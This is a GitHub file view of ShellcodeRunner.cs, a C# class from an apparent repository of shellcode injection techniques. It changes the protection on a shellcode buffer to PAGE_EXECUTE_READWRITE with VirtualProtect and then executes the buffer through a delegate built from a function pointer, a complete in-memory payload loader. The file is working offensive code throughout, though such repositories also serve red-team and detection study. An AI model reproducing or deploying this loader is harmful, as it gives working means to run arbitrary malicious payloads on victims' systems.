-
Notifications
You must be signed in to change notification settings - Fork 97
/
Copy pathShellcodeRunner.cs
33 lines (29 loc) · 1.33 KB
/
ShellcodeRunner.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using static ShellcodeInjectionTechniques.Debugger;
using static ShellcodeInjectionTechniques.Native;
namespace ShellcodeInjectionTechniques
{
class ShellcodeRunner : ITechnique
{
private delegate void ShellcodeDelegate();
public void Run(Process target, byte[] shellcode)
{
unsafe
{
fixed (byte* ptr = shellcode)
{
// set the memory where the shellcode is to PAGE_EXECUTE_READWRITE
IntPtr memoryAddress = (IntPtr)ptr;
VirtualProtect(memoryAddress, (UIntPtr)shellcode.Length, MemoryProtection.PAGE_EXECUTE_READWRITE, out MemoryProtection lpfOldProtect);
Debug("[+] VirtualProtect() - set to PAGE_EXECUTE_READWRITE, shellcode address: 0x{0}", new string[] { memoryAddress.ToString("X") });
// execute the shellcode using a delegate function
Debug("[+] Executing shellcode - memory address: 0x{0}", new string[] { memoryAddress.ToString("X") });
ShellcodeDelegate func = (ShellcodeDelegate)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(ShellcodeDelegate));
func();
}
}
}
}
}